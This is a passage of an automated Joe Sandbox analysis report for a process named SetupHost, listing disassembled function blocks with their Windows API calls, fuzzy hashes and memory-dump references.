                                                                                                                                                                                                                • Opcode Fuzzy Hash: d243318ae709186c551a64f668d39d2a0d80052830d360562e2966da3d877326
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D711E735A0032897C721EBA18D49BDE3A6CDBC4754F1040A4F945AB280DEF49DC247E0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020,00000001,?,?,?,009E3956,?,?,009DE358,00000014,00000000,00000008,0000000C,00000000,00000001), ref: 009E4091
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E3956,?,?,009DE358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 009E4098
                                                                                                                                                                                                                • SetLastError.KERNEL32(0000000E,?,009E3956,?,?,009DE358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 009E40A6
                                                                                                                                                                                                                  • Part of subcall function 009E4131: GetProcessHeap.KERNEL32(00000008,00000C00,009E4083,00000001,?,?,?,009E3956,?,?,009DE358,00000014,00000000,00000008,0000000C,00000000), ref: 009E4138
                                                                                                                                                                                                                  • Part of subcall function 009E4131: HeapAlloc.KERNEL32(00000000,?,009E3956,?,?,009DE358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 009E413F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,009E3956,?,?,009DE358,00000014,00000000,00000008,0000000C,00000000,00000001,00000000), ref: 009E40EC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E3956), ref: 009E40F3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$ErrorFreeLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2557328389-0
                                                                                                                                                                                                                • Opcode ID: 47dc33eeb91afcc29335405cf027251b6d94c0f60d29276cf01471dd011b6573
                                                                                                                                                                                                                • Instruction ID: 0be280f96063bbdc2d4d3048ba38bd54f997905638c28e4c5c6247e7699ec214
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47dc33eeb91afcc29335405cf027251b6d94c0f60d29276cf01471dd011b6573
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38114C71604346EBDB12DFE6D885BAB3BBCBB58356F008479FA05DB241DAB0DD018B61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,00000000,00000000,00000000,?,009E5590), ref: 009E0670
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,009E5590), ref: 009E06CC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E5590), ref: 009E06D3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,009E5590), ref: 009E06E7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E5590), ref: 009E06EE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2495544939-0
                                                                                                                                                                                                                • Opcode ID: 6f4d5c72b97b6fafd59348a99bd73aa7b1c67276bb8bd676611c9b6bb88e0351
                                                                                                                                                                                                                • Instruction ID: c94459168d225b4ef98cdd53890b14294cfbdfd65ed31d20aa2573adc986cb0e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f4d5c72b97b6fafd59348a99bd73aa7b1c67276bb8bd676611c9b6bb88e0351
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6711C232B00351A7CB22ABF74D487AF65BEAFD8B90F195524F902D7240DEF0CC5296A0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,?,00000000,?,009E8E5B,?,009E8EC0,00000000,009E92C0,00000001,?,?,?,00000000,00000000,?), ref: 009E9237
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,009E8CDB,?,00000000,00000000), ref: 009E9256
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,009E8CDB,?,00000000,00000000), ref: 009E926C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,009E8CDB,?,00000000,00000000), ref: 009E9273
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000008,?,009E8CDB,?,00000000,00000000), ref: 009E9281
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalHeapSection$AllocEnterErrorLastLeaveProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2288769807-0
                                                                                                                                                                                                                • Opcode ID: 8bd57dba7cd8fae2d051cf73e177dda07ef3fddc214d0c9da79c95e314f14df4
                                                                                                                                                                                                                • Instruction ID: b849ddcad22df8a51b51fe008690ee5f08b52696c67e1250497f41a88ad9a749
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bd57dba7cd8fae2d051cf73e177dda07ef3fddc214d0c9da79c95e314f14df4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D215975601B42ABCB25CF5AD984A66B7F8FF88711710992EE56AC3B00E730F841CF90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                                                                                • Opcode ID: ac1c7461bc356ac8f05d2e60695432bc95e964ac77767fd3c64c49eaa913cf24
                                                                                                                                                                                                                • Instruction ID: c9701d7848f5bb0b273cb41f5bb2a6df965e8c097417c36ce944faf55e8a8166
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac1c7461bc356ac8f05d2e60695432bc95e964ac77767fd3c64c49eaa913cf24
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11114872604605EFDB209FA6D844F5A77B9EBD8761F10852CF99987260DB30DC42CF61
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,009C0017), ref: 009BFB9A
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BFBA1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,009C0017), ref: 009BFBB7
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009BFBBE
                                                                                                                                                                                                                • memset.MSVCRT ref: 009BFBC8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 145835812-0
                                                                                                                                                                                                                • Opcode ID: 007319be7e292477a3d6dde77576723d7c9a5ce5e9a62551545a06f567002077
                                                                                                                                                                                                                • Instruction ID: 05181757d5605f3186d2b0367575a4fa12e08bf54628d7987a5f766693be680d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 007319be7e292477a3d6dde77576723d7c9a5ce5e9a62551545a06f567002077
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1F03032514B10ABC772ABA2EE1CDEF7ABCFBD9762704556DF14A81450DB349443DB20
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __allrem.LIBCMT ref: 009E3B19
                                                                                                                                                                                                                • SetLastError.KERNEL32(000004D3,?,?,?,00000000,?,00A00000,00000000,00000000,00000000,0C000100,?,00000000,00000000,?,00000000), ref: 009E3B40
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0C000100,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,0C000100), ref: 009E3C2E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00000000,00000000,0C000100,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 009E3C49
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$__allrem
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3570885919-0
                                                                                                                                                                                                                • Opcode ID: dc1eb68cd2b01ffd8b7a2b845e1ee1ddd71a42b621b4bdf454dbeb478a3d5d16
                                                                                                                                                                                                                • Instruction ID: 4b70398e747908816d54fe4c4372bc593fed888351b9d3b91dbbcbe8e2513ff7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc1eb68cd2b01ffd8b7a2b845e1ee1ddd71a42b621b4bdf454dbeb478a3d5d16
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E513E71A0024AAFDB15CF6AC848BAEBBF9FF94715F15C529E815A7250D730DE40CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • BUCL::Rtl::Add<SIZE_T>( sizeof(MICRODOM_HEADER), cbStringPoolSize, cbDomLayoutSize, cbPositionDataSize, cbDoctypeDataSize, cbRequiredSize), xrefs: 009D4583
                                                                                                                                                                                                                • CMicrodomBuilder::ConstructAndWriteMicrodom, xrefs: 009D4575
                                                                                                                                                                                                                • onecore\base\xml\udom_builder.cpp, xrefs: 009D456A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: BUCL::Rtl::Add<SIZE_T>( sizeof(MICRODOM_HEADER), cbStringPoolSize, cbDomLayoutSize, cbPositionDataSize, cbDoctypeDataSize, cbRequiredSize)$CMicrodomBuilder::ConstructAndWriteMicrodom$onecore\base\xml\udom_builder.cpp
                                                                                                                                                                                                                • API String ID: 2221118986-1326678980
                                                                                                                                                                                                                • Opcode ID: 6c7028afa58f4ef4ab654cba20d2c4836fc9862ff6c98ed6e2b59ff5c16e57f4
                                                                                                                                                                                                                • Instruction ID: 161ecebf58dbb38a463915d1ca90d0495de1d7983543c64c7ca305f344f76311
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7028afa58f4ef4ab654cba20d2c4836fc9862ff6c98ed6e2b59ff5c16e57f4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68515372E4071A8BCF10DFA4DC81AAEB7F5BF98314B14892AE421EB351EB74D5058B54
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: memset.MSVCRT ref: 009BF023
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: memset.MSVCRT ref: 009BF02F
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: memset.MSVCRT ref: 009BF041
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: memset.MSVCRT ref: 009BF053
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: memset.MSVCRT ref: 009BF065
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: memset.MSVCRT ref: 009BF077
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: memset.MSVCRT ref: 009BF0B7
                                                                                                                                                                                                                  • Part of subcall function 009BEFEF: GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 009BF0CE
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00A12428,00000A4C,009DF080,?,?,00000000,00000000), ref: 009BF2C6
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00A12428,00000A4C,009DF080), ref: 009BF31B
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00A12428,00000A4C,009DF080), ref: 009BF344
                                                                                                                                                                                                                • CompareStringW.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,?,?,?,?,?,00A12428,00000A4C,009DF080), ref: 009BF41E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$CompareString$ErrorLastNamePathVolume
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3838570357-0
                                                                                                                                                                                                                • Opcode ID: 81938f3b8055070105512a2a9627980f35281c1916194dff30569164b1cc21c7
                                                                                                                                                                                                                • Instruction ID: f462fe3660067ba3b67a009b1c945a27f1338944fc49fd8b96226b046abd012b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81938f3b8055070105512a2a9627980f35281c1916194dff30569164b1cc21c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED51D575A002299BCF30DB54CE51BEDB7B8EB857B0F1042E5E919A65D0E7B09E85CF40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0E1BC
                                                                                                                                                                                                                • GetTraceLoggerHandle.ADVAPI32(00000000), ref: 00A0E1C9
                                                                                                                                                                                                                • GetTraceEnableLevel.ADVAPI32(00000000), ref: 00A0E1D9
                                                                                                                                                                                                                • GetTraceEnableFlags.ADVAPI32(00000000), ref: 00A0E1E5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Trace$Enable$FlagsHandleLevelLoggermemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1282773000-0
                                                                                                                                                                                                                • Opcode ID: be12380b317f986154256ab39819b4e5f5592ce3da0e8cb637191802a4a2aa44
                                                                                                                                                                                                                • Instruction ID: ca58eff0ac08c6d179c867cf185a7ea5a87fae6fbbb63cd973c6003a70d212a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: be12380b317f986154256ab39819b4e5f5592ce3da0e8cb637191802a4a2aa44
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 364183326057459BC720CF69D8809A6BBF5EB9D310B184E2CE8DA87691D630EC55EB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009BB84C
                                                                                                                                                                                                                  • Part of subcall function 009BBCDA: __EH_prolog3.LIBCMT ref: 009BBCE1
                                                                                                                                                                                                                  • Part of subcall function 009BBCDA: GetProcessHeap.KERNEL32(00000000,-00000004,00000000,00000008,-00000004,009BBD20,00000000,009BB866,00000010,009B7CF1,?,?,00000008,009B432C), ref: 009BBD07
                                                                                                                                                                                                                  • Part of subcall function 009BBCDA: HeapFree.KERNEL32(00000000,?,00000008), ref: 009BBD0E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,0000000C,00000010,009B7CF1,?,?,00000008,009B432C), ref: 009BB869
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000008,009B432C), ref: 009BB870
                                                                                                                                                                                                                • RtlAdjustPrivilege.NTDLL ref: 009BB8E5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$H_prolog3Process$AdjustAllocFreePrivilege
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2918340067-0
                                                                                                                                                                                                                • Opcode ID: 2e515c66140e247c58691498c55099ef479e666c57296409c99d8147be133bae
                                                                                                                                                                                                                • Instruction ID: b69cde132c68b45fd4e5727287597fcacdcc35b4dceddfd82001b0d935f80128
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e515c66140e247c58691498c55099ef479e666c57296409c99d8147be133bae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF31C275E0021A9BCB14DFA8CA51BEE7A79BF44320F154429E646AB3C1CBB49E00CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,00A12AF8,00000020,00A081A4), ref: 00A080AB
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00A12AF8,00000020,00A081A4), ref: 00A080B2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                • Opcode ID: f23c447d56d853ce6fc5b191775ea518ce46ed5cb95bc3346516c8de97b4538f
                                                                                                                                                                                                                • Instruction ID: c5c62b801d515ab8435bea14e2135311a65e1b411870514da10df4611d38c56a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f23c447d56d853ce6fc5b191775ea518ce46ed5cb95bc3346516c8de97b4538f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 492169B2D00219EFDF10CF99DD45AEEBAB5FF08350F14412AE850B7280EB7989418FA4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(0000065B,00000000,00000000,00000002,00000000,0000000B), ref: 00A08781
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A08791
                                                                                                                                                                                                                • wcscpy_s.MSVCRT ref: 00A087AC
                                                                                                                                                                                                                • wcscpy_s.MSVCRT ref: 00A087BF
                                                                                                                                                                                                                  • Part of subcall function 00A0A6C5: HeapAlloc.KERNEL32(?,00000000,?,?,?,00000000,00000000,-00000001,?,?,00A087D7,?,?), ref: 00A0A74F
                                                                                                                                                                                                                  • Part of subcall function 00A0A6C5: memset.MSVCRT ref: 00A0A761
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AllocHeapmemsetwcscpy_s
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3610457382-0
                                                                                                                                                                                                                • Opcode ID: 72a22eb0ee6782146b1415bb7048a7f97e15404ca3976ae40238907ba91ce260
                                                                                                                                                                                                                • Instruction ID: 9ab44793a25cf1e84a9fbcabf7d0ed565f598ce435c4533ef3100477fa680b2b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72a22eb0ee6782146b1415bb7048a7f97e15404ca3976ae40238907ba91ce260
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2211333A80020EABCB21DF58DC44EEFBB79EFC4704F148159F9419B258DA75AA16CBD4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,C0000000,00000007,00000000,00000002,-080000FF,00000000), ref: 009E5625
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,009E89FD,00000000,?,009E8E06,?,?,?,00000000,00000000,?), ref: 009E563D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,009E89FD), ref: 009E5644
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000006,?,00000008,00000000,009E8CDB,009E8CDB,?,009E89FD,00000000,?,009E8E06,?,?,?,00000000,00000000), ref: 009E5655
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CreateErrorFileFreeLastProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2484823274-0
                                                                                                                                                                                                                • Opcode ID: e943dc4bd7990e158f788b147e4e685812eb634bce2a6f5c2eb1ebecd092379c
